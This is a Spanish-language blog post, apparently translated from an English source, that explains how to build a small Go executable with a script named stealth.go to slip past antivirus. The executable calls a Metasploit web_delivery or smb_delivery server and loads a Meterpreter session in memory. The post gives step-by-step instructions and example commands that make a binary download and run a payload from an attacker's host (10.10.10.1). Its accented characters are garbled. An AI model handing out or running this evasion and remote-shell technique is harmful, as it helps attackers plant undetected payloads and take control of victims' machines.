Showing posts with label golang. Show all posts
Showing posts with label golang. Show all posts
Thursday, September 28, 2017
Evadiendo el AV con Golang
Evadiendo el AV con Golang
Pero, �qu� sucede si no tenemos previamente una shell y s�lo podemos llamar a un ejecutable?. Podr�amos crear un meterpreter u otro payload pero al subirlo y escribirlo en disco es muy probable que el antivirus lo detecte. Pero, �y si creamos un ejecutable muy simple que s�lo haga la llamada necesaria a web_delivery o smb_delivery y luego cargue meterpreter en memoria? Este ejecutable probablemente no ser� detectado por el AV...
El script stealth.go hace exactamente eso. Toma unos pocos par�metros, el tipo de payload deseado, el servidor Metasploit y el puerto, y un nombre de carpeta y crea un peque�o ejecutable de Golang que hace la llamada apropiada a Metasploit.
Para usar el script necesitaremos una versi�n reciente de Golang y seguir unos sencillos pasos:
1.- Configura el m�dulo Metasploit web_delivery o smb_delivery seg�n lo deseado. Ten en cuenta que para el m�dulo web_delivery se necesita establecer el par�metro URIPATH y en el m�dulo smb_delivery se debe establecer el par�metro SHARE y dejar sin configurar el par�metro FOLDER_NAME.
2.- Ejecuta el m�dulo stealth.go para crear un binario llamado shell (* nix) o shell.exe (Windows):
go run stealth.go ps 10.10.10.1 8080 test
Esto construir� un ejecutable que har� una llamada de Powershell para descargar y ejecutar c�digo desde http://10.10.10.1:8080/test.
go run stealth.go smb 10.10.10.1 445 test
Y esto construir� un ejecutable que har� una llamada rundll32 a 10.10.10.1 est y ejecutar� el payload entregado.
3.- Ejecuta shell o shell.exe y comprueba en Metasploit si tenemos la sesi�n Meterpreter.
El c�digo stealth.go se puede encontrar en Github: https://github.com/averagesecurityguy/scripts/blob/master/stealth.go
Fuente: Bypassing AntiVirus with Golang
download file now
Subscribe to:
Posts (Atom)